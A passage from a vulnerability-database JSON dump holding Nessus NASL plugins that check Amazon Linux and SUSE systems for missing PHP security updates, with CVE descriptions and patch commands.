(CVE-2015-7804)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=69720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=70433\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-601.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php56' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-intl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php56-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-bcmath-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-cli-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-common-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dba-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dbg-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-debuginfo-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-devel-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-embedded-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-enchant-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-fpm-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gd-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gmp-5.6.14-1.119.amzn1\")) 
flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-imap-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-intl-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-ldap-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mbstring-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mcrypt-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mssql-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mysqlnd-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-odbc-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-opcache-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pdo-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pgsql-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-process-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pspell-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-recode-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-snmp-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-soap-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-tidy-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xml-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xmlrpc-5.6.14-1.119.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php56 / php56-bcmath / php56-cli / php56-common / php56-dba / 
etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:08", "description": "The PHP5 script interpreter was updated to fix security issues :\n\n - CVE-2015-6836: A SOAP serialize_function_call() type confusion leading to remote code execution problem was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2015-10-12T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php5 (SUSE-SU-2015:1701-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:php5", "p-cpe:/a:novell:suse_linux:php5-bcmath", "p-cpe:/a:novell:suse_linux:php5-bz2", "p-cpe:/a:novell:suse_linux:php5-calendar", "p-cpe:/a:novell:suse_linux:php5-ctype", "p-cpe:/a:novell:suse_linux:php5-curl", "p-cpe:/a:novell:suse_linux:php5-dba", "p-cpe:/a:novell:suse_linux:php5-dbase", "p-cpe:/a:novell:suse_linux:php5-dom", "p-cpe:/a:novell:suse_linux:php5-exif", "p-cpe:/a:novell:suse_linux:php5-fastcgi", "p-cpe:/a:novell:suse_linux:php5-ftp", "p-cpe:/a:novell:suse_linux:php5-gd", "p-cpe:/a:novell:suse_linux:php5-gettext", "p-cpe:/a:novell:suse_linux:php5-gmp", "p-cpe:/a:novell:suse_linux:php5-hash", "p-cpe:/a:novell:suse_linux:php5-iconv", "p-cpe:/a:novell:suse_linux:php5-json", "p-cpe:/a:novell:suse_linux:php5-ldap", "p-cpe:/a:novell:suse_linux:php5-mbstring", "p-cpe:/a:novell:suse_linux:php5-mcrypt", "p-cpe:/a:novell:suse_linux:php5-mysql", 
"p-cpe:/a:novell:suse_linux:php5-odbc", "p-cpe:/a:novell:suse_linux:php5-openssl", "p-cpe:/a:novell:suse_linux:php5-pcntl", "p-cpe:/a:novell:suse_linux:php5-pdo", "p-cpe:/a:novell:suse_linux:php5-pear", "p-cpe:/a:novell:suse_linux:php5-pgsql", "p-cpe:/a:novell:suse_linux:php5-pspell", "p-cpe:/a:novell:suse_linux:php5-shmop", "p-cpe:/a:novell:suse_linux:php5-snmp", "p-cpe:/a:novell:suse_linux:php5-soap", "p-cpe:/a:novell:suse_linux:php5-suhosin", "p-cpe:/a:novell:suse_linux:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:php5-sysvsem", "p-cpe:/a:novell:suse_linux:php5-sysvshm", "p-cpe:/a:novell:suse_linux:php5-tokenizer", "p-cpe:/a:novell:suse_linux:php5-wddx", "p-cpe:/a:novell:suse_linux:php5-xmlreader", "p-cpe:/a:novell:suse_linux:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:php5-xsl", "p-cpe:/a:novell:suse_linux:php5-zip", "p-cpe:/a:novell:suse_linux:php5-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1701-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86340", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1701-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86340);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"SUSE SLES11 Security Update : php5 (SUSE-SU-2015:1701-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP5 script interpreter was updated to fix security 
issues :\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6838/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151701-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28669fc0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-php5-12121=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2 :\n\nzypper in -t patch dbgsp2-php5-12121=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"apache2-mod_php5-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-bcmath-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-bz2-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-calendar-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-ctype-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-curl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-dba-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-dbase-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-dom-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-exif-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-fastcgi-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-ftp-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-gd-5.2.14-0.7.30.72.1\")) 
flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-gettext-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-gmp-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-hash-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-iconv-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-json-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-ldap-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-mbstring-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-mcrypt-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-mysql-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-odbc-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-openssl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pcntl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pdo-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pear-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pgsql-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pspell-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-shmop-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-snmp-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-soap-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-suhosin-5.2.14-0.7.30.72.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-sysvmsg-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-sysvsem-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-sysvshm-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-tokenizer-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-wddx-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xmlreader-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xmlrpc-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xmlwriter-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xsl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-zip-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-zlib-5.2.14-0.7.30.72.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:33", "description": "The PHP5 script interpreter was updated to fix various security issues :\n\n - CVE-2015-6831: A use after free vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#942291] [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject items could be used to crash php or potentially execute code. 
[bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP files could be used to overwrite files outside of intended area. [bnc#942296]\n\n - CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#945403] \n\n - CVE-2015-6835: A Use After Free Vulnerability in session unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#945402]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type confusion leading to remote code execution problem was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : php5 (openSUSE-2015-609)", "bulletinFamily": "scanner", "cvss2": {}, 